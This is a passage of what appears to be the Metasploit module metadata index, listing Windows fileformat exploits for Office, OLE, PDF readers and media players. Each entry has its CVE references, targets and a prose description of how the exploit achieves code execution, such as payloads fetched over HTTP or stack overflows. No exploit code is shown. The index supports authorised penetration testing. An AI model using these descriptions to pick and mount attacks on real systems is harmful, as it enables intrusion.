But when \"3\"\n is used (again, for the INF file), it will cause the packager to try to find appropriate\n handler for it, which will end up with C:\\Windows\\System32\\infDefaultInstall.exe, and that\n will install/run the malicious INF file, and finally give us arbitrary code execution.", - "references": [ - "CVE-2014-4114", - "OSVDB-113140", - "MSB-MS14-060", - "BID-70419", - "URL-http://www.isightpartners.com/2014/10/cve-2014-4114/", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 / Office 2010 SP2 / Office 2013" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_060_sandworm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [], - "AKA": [ - "sandworm" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_064_packager_python": { - "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python", - "fullname": "exploit/windows/fileformat/ms14_064_packager_python", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-11-12", - "type": "exploit", - "author": [ - "Haifei Li", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability\n publicly known as \"Sandworm\", on systems with Python for Windows installed. 
Windows Vista\n SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.\n However, based on our testing, the most reliable setup is on Windows platforms running\n Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as\n those using Office 2010 SP1 may be less stable, and may end up with a crash due to a\n failure in the CPackage::CreateTempFileName function.", - "references": [ - "CVE-2014-6352", - "MSB-MS14-064", - "BID-70690", - "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm" - ], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_064_packager_python.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_064_packager_python", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_064_packager_run_as_admin": { - "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution", - "fullname": "exploit/windows/fileformat/ms14_064_packager_run_as_admin", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-10-21", - "type": "exploit", - "author": [ - "Haifei Li", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.\n The Microsoft update tried to fix the vulnerability publicly known as \"Sandworm\". Platforms\n such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known\n to be vulnerable. 
However, based on our testing, the most reliable setup is on Windows\n platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other\n setups such as using Office 2010 SP1 might be less stable, and may end up with a\n crash due to a failure in the CPackage::CreateTempFileName function.", - "references": [ - "CVE-2014-6352", - "MSB-MS14-064", - "BID-70690", - "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 / Office 2010 SP2 / Office 2013" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_064_packager_run_as_admin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms15_020_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-10", - "type": "exploit", - "author": [ - "Michael Heerklotz", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This module creates the required files to exploit the vulnerability. They must be\n uploaded to an UNC path accessible by the target. 
This module has been tested successfully\n on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", - "references": [ - "CVE-2015-0096", - "MSB-MS15-020", - "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", - "URL-https://github.com/rapid7/metasploit-framework/pull/4911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms15_020_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms15_100_mcl_exe": { - "name": "MS15-100 Microsoft Windows Media Center MCL Vulnerability", - "fullname": "exploit/windows/fileformat/ms15_100_mcl_exe", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-09-08", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits a vulnerability in Windows Media Center. 
By supplying\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\n which can result in arbitrary code execution.", - "references": [ - "CVE-2015-2509", - "MSB-MS15-100" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms15_100_mcl_exe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms_visual_basic_vbp": { - "name": "Microsoft Visual Basic VBP Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms_visual_basic_vbp", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-09-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Microsoft Visual\n Basic 6.0. 
When a specially crafted vbp file containing a long\n reference line, an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2007-4776", - "OSVDB-36936", - "BID-25629" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 English" - ], - "mod_time": "2021-02-13 04:10:13 +0000", - "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms_visual_basic_vbp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mswin_tiff_overflow": { - "name": "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow", - "fullname": "exploit/windows/fileformat/mswin_tiff_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-11-05", - "type": "exploit", - "author": [ - "Unknown", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Microsoft's Tagged Image File Format.\n It was originally discovered in the wild, targeting Windows XP and Windows Server 2003\n users running Microsoft Office, specifically in the Middle East and South Asia region.\n\n The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a\n drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,\n and stored in the EAX register. The 32-bit register will run out of storage space to\n represent the large value, which ends up being 0, but it still gets pushed as a\n dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a\n chunk anyway with size 0, and the address of this chunk is used as the destination buffer\n of a memcpy function, where the source buffer is the EXIF data (an extended image format\n supported by TIFF), and is also user-controlled. 
A function pointer in the chunk returned\n by HeapAlloc will end up being overwritten by the memcpy function, and then later used\n in OGL!GdipCreatePath. By successfully controlling this function pointer, and the\n memory layout using ActiveX, it is possible to gain arbitrary code execution under the\n context of the user.", - "references": [ - "CVE-2013-3906", - "MSB-MS13-096", - "OSVDB-99376", - "URL-http://technet.microsoft.com/en-us/security/advisory/2896666", - "URL-http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 with Office Standard 2010" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mswin_tiff_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/msworks_wkspictureinterface": { - "name": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution", - "fullname": "exploit/windows/fileformat/msworks_wkspictureinterface", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-11-28", - "type": "exploit", - "author": [ - "dean " - ], - "description": "The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n to execute arbitrary code on a system. By passing a negative integer to the\n WksPictureInterface method, an attacker could execute arbitrary code on the system\n with privileges of the victim. 
Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n This control is not marked safe for scripting, please choose your attack vector carefully.", - "references": [ - "CVE-2008-1898", - "OSVDB-44458" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2-SP3 IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/msworks_wkspictureinterface", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mymp3player_m3u": { - "name": "Steinberg MyMP3Player 3.0 Buffer Overflow", - "fullname": "exploit/windows/fileformat/mymp3player_m3u", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-03-18", - "type": "exploit", - "author": [ - "n3w7u", - "m_101" - ], - "description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. 
When\n the application is used to open a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-64580", - "EDB-11791" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal", - "Windows Universal (SEH)", - "Windows XP SP3 French" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mymp3player_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/netop": { - "name": "NetOp Remote Control Client 9.5 Buffer Overflow", - "fullname": "exploit/windows/fileformat/netop", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-28", - "type": "exploit", - "author": [ - "Ruben Alejandro \"chap0\"" - ], - "description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n When opening a .dws file containing a specially crafted string longer then 520\n characters will allow an attacker to execute arbitrary code.", - "references": [ - "OSVDB-72291", - "EDB-17223" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/netop.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/netop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/nitro_reader_jsapi": { - "name": "Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution", - "fullname": "exploit/windows/fileformat/nitro_reader_jsapi", - "aliases": [], - 
"rank": 600, - "disclosure_date": "2017-07-24", - "type": "exploit", - "author": [ - "mr_me ", - "bcoles ", - "sinn3r " - ], - "description": "This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro\n PDF Reader version 11. The saveAs() Javascript API function allows for writing\n arbitrary files to the file system. Additionally, the launchURL() function allows\n an attacker to execute local files on the file system and bypass the security dialog\n\n Note: This is 100% reliable.", - "references": [ - "CVE-2017-7442", - "URL-http://srcincite.io/advisories/src-2017-0005/", - "URL-https://blogs.securiteam.com/index.php/archives/3251" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/nitro_reader_jsapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/fileformat/nuance_pdf_launch_overflow": { - "name": "Nuance PDF Reader v6.0 Launch Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/nuance_pdf_launch_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-08", - "type": "exploit", - "author": [ - "corelanc0d3r ", - "rick2600" - ], - "description": "This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. 
This results in overwriting a structured exception handler record.\n This exploit does not use javascript.", - "references": [ - "OSVDB-68514", - "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Nuance PDF Reader v6.x (XP SP3)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/nuance_pdf_launch_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_dde_delivery": { - "name": "Microsoft Office DDE Payload Delivery", - "fullname": "exploit/windows/fileformat/office_dde_delivery", - "aliases": [], - "rank": 0, - "disclosure_date": "2017-10-09", - "type": "exploit", - "author": [ - "mumbai" - ], - "description": "This module generates an DDE command to place within\n a word document, that when executed, will retrieve a HTA payload\n via HTTP from an web server.", - "references": [ - "URL-https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563", - "URL-https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/office_dde_delivery.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_dde_delivery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_excel_slk": { - "name": 
"Microsoft Excel .SLK Payload Delivery", - "fullname": "exploit/windows/fileformat/office_excel_slk", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-07", - "type": "exploit", - "author": [ - "Carter Brainerd", - "Stan Hegt", - "Pieter Ceelen" - ], - "description": "This module generates a download and execute Powershell\n command to be placed in an .SLK Excel spreadsheet.\n When executed, it will retrieve a payload via HTTP\n from a web server. When the file is opened, the\n user will be prompted to \"Enable Content.\" Once\n this is pressed, the payload will execute.", - "references": [ - "URL-https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files", - "URL-https://www.twitter.com/StanHacked/status/1049047727403937795", - "URL-http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Excel" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/office_excel_slk.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_excel_slk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_ms17_11882": { - "name": "Microsoft Office CVE-2017-11882", - "fullname": "exploit/windows/fileformat/office_ms17_11882", - "aliases": [], - "rank": 0, - "disclosure_date": "2017-11-15", - "type": "exploit", - "author": [ - "mumbai", - "embedi" - ], - "description": "Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. 
The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.", - "references": [ - "CVE-2017-11882", - "URL-http://web.archive.org/web/20211201000500/https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about", - "URL-https://github.com/embedi/CVE-2017-11882" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/office_ms17_11882.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_ms17_11882", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_ole_multiple_dll_hijack": { - "name": "Office OLE Multiple DLL Side Loading Vulnerabilities", - "fullname": "exploit/windows/fileformat/office_ole_multiple_dll_hijack", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-08", - "type": "exploit", - "author": [ - "Yorick Koster" - ], - "description": "Multiple DLL side loading vulnerabilities were found in various COM components.\n These issues can be exploited by loading various these components as an embedded\n OLE object. When instantiating a vulnerable object Windows will try to load one\n or more DLLs from the current working directory. If an attacker convinces the\n victim to open a specially crafted (Office) document from a directory also\n containing the attacker's DLL file, it is possible to execute arbitrary code with\n the privileges of the target user. 
This can potentially result in the attacker\n taking complete control of the affected system.", - "references": [ - "CVE-2015-6132", - "CVE-2015-6128", - "CVE-2015-6133", - "CVE-2016-0041", - "CVE-2016-0100", - "CVE-2016-3235", - "MSB-MS15-132", - "MSB-MS16-014", - "MSB-MS16-025", - "MSB-MS16-041", - "MSB-MS16-070", - "URL-https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html", - "URL-https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html", - "URL-https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "All", - "COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)", - "Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)", - "Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)", - "Shutdown UX / Windows 10 / Office 2016 (MS15-132)", - "MapUpdateTask Tasks / Windows 10 / 
Office 2016 (MS16-014)", - "Microsoft Visio 2010 / Windows 7 (MS16-070)", - "Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)", - "OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)", - "Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)", - "NPS Datastore server / Windows Vista / Office 2010 (MS16-014)", - "BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_ole_multiple_dll_hijack", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_word_hta": { - "name": "Microsoft Office Word Malicious Hta Execution", - "fullname": "exploit/windows/fileformat/office_word_hta", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-04-14", - "type": "exploit", - "author": [ - "Haifei Li", - "ryHanson", - "wdormann", - "DidierStevens", - "vysec", - "Nixawk", - "sinn3r " - ], - "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a olelink object can make a http(s) request,\n and execute hta code in response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. 
This module was created by reversing a public\n malware sample.", - "references": [ - "CVE-2017-0199", - "URL-https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/", - "URL-https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html", - "URL-https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/", - "URL-https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", - "URL-https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html", - "URL-https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf", - "URL-https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/", - "URL-https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100", - "URL-https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/", - "URL-https://www.microsoft.com/en-us/download/details.aspx?id=10725", - "URL-https://msdn.microsoft.com/en-us/library/dd942294.aspx", - "URL-https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Word" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/office_word_hta.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_word_hta", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/openoffice_ole": { - "name": "OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow", - 
"fullname": "exploit/windows/fileformat/openoffice_ole", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-04-17", - "type": "exploit", - "author": [ - "Marsu ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on\n Microsoft Windows XP SP3.\n\n By supplying a OLE file with a malformed DocumentSummaryInformation stream, an\n attacker can gain control of the execution flow, which results arbitrary code\n execution under the context of the user.", - "references": [ - "CVE-2008-0320", - "OSVDB-44472", - "BID-28819", - "EDB-5584", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/openoffice_ole", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/orbit_download_failed_bof": { - "name": "Orbit Downloader URL Unicode Conversion Overflow", - "fullname": "exploit/windows/fileformat/orbit_download_failed_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-04-03", - "type": "exploit", - "author": [ - "Diego Juarez", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in Orbit Downloader.\n The vulnerability is due to Orbit converting a URL ascii string to unicode\n in an insecure way with MultiByteToWideChar.\n The vulnerability is exploited with a specially crafted metalink file that\n should be opened with Orbit through the \"File->Add Metalink...\" option.", - "references": [ 
- "BID-28541", - "OSVDB-44036", - "CVE-2008-1602", - "URL-http://www.coresecurity.com/content/orbit-downloader" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Orbit Downloader 6.4 on Windows XP SP3", - "Orbit Downloader 6.4 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/orbit_download_failed_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/orbital_viewer_orb": { - "name": "Orbital Viewer ORB File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/orbital_viewer_orb", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-27", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in David Manthey's\n Orbital Viewer. When processing .ORB files, data is read from file into\n a fixed-size stack buffer using the fscanf function. Since no bounds\n checking is done, a buffer overflow can occur. 
Attackers can execute\n arbitrary code by convincing their victim to open an ORB file.", - "references": [ - "BID-38436", - "OSVDB-62580", - "CVE-2010-0688", - "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/", - "EDB-11581" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Orbital Viewer 1.04 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/orbital_viewer_orb.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/orbital_viewer_orb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ovf_format_string": { - "name": "VMWare OVF Tools Format String Vulnerability", - "fullname": "exploit/windows/fileformat/ovf_format_string", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-08", - "type": "exploit", - "author": [ - "Jeremy Brown", - "juan vazquez " - ], - "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. 
The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", - "references": [ - "CVE-2012-3569", - "OSVDB-87117", - "BID-56468", - "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VMWare OVF Tools 2.1 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/ovf_format_string.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ovf_format_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/proshow_cellimage_bof": { - "name": "ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/proshow_cellimage_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-20", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n An attacker must send the file to victim and the victim must open the file.", - "references": [ - "CVE-2009-3214", - "OSVDB-57226", - "EDB-9483", - "EDB-9519" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb", - "is_install_path": true, - "ref_name": 